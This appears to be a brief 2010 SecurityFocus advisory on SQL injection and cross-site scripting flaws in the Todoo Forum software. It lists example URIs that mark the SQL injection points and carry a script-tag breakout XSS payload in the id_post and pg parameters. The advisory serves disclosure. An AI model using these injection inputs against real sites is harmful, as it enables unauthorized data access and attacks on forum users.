Todoo Forum Multiple SQL Injection and Cross Site Scripting Vulnerabilities

Attackers can use a browser to exploit the SQL-injection issues. An attacker must trick a victim into following a malicious URI to exploit cross-site scripting issues.

The following example URIs are available:

http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1
http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here]
http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1
http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script>


 

Privacy Statement
Copyright 2010, SecurityFocus